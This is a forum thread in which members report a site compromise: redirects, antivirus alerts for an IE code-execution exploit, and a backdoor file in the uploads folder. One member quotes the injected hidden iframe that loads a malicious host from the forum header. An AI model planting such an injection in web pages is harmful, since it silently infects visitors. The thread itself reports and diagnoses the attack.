Trojans?

[PranK]

Ok, there was a backdoor file in our /uploads dir which has now been removed and will stop any re-occurance of this issue.

[Duncan]

yeah all good for me

[sewid]

Just visited a thread then and got two different redirections opening up.

196.regvista.com or something and another one which i didnt catch in time.

[ish]

u will keep getting picked off till you address who ever has a backdoor on Admin.

[R31Nismoid]

yep... problem is back again

[TracidTrax]

so this is y my IE kept locking up last week, everytime i came onto SAU IE would just lock up

all is good now

[ookami]

Its back .. happened first thing this morning again.

[Munkyb0y]

Yep, just got it too.

removed the url in case someone decided to click on it

that's the source according to my a/v

[Mr-Toy33]

Got the following message from my Norton Antivirus when coming to the site just now.

Intrusion: HTTP MSIE CreateTextRange Code Exec.

Intruder: 196.regvista.com(85.255.115.196)(http(80)).

Risk Level: High.

Protocol: TCP.

Attack IP: detzol(192.168.1.169).

Attacked Port: 1275.

[Mr-Toy33]

just looking at the source code that i can see of the index.php file.

look at the header files for the forum, you'll find there is this code

"<iframe src="http://196.regvista.com/index.php?ref=nu" width="0" height="0" frameborder="0"></iframe>"

in there somewhere which is calling on the site which holds the trogan file to infect pc's from this site.

[Mcleod]

Hi,

I've logged into Admin CP and removed the thing that keeps trying to send the trojan to people.

I beleive PranK is overseas atm so best I stepped in and helped out..

-

Mcleod

[Skitza]

Still there

[R31Nismoid]

Yeah, definately not fixed

[R33S2]

Got me today as well.

[wilch]

Well the trojan forced me to move to Firefox. Didn't think I ever would. But now I don't think I'll go back to IE. Hurrah for firefox extensions.

It sucks that some corporations won't allow the usage of firefox though. Hell, we've been putting Mozilla Firefox in the IBM build since Firefox 1.0.1 or something.

[Dump_Pipe]

I just got done again with the virus today as well.

[allblitz]

Its still there

[braadz]

it really fkd up 2 of my computers, work & home..

i had to format both then i came on again, and i got it again, IE errors etc all over the place

[ish]

A format is not required to remove this trojan / Virus

[Mr Italy!]

Got me again just then....

So is this thing actually doing damage to my PC?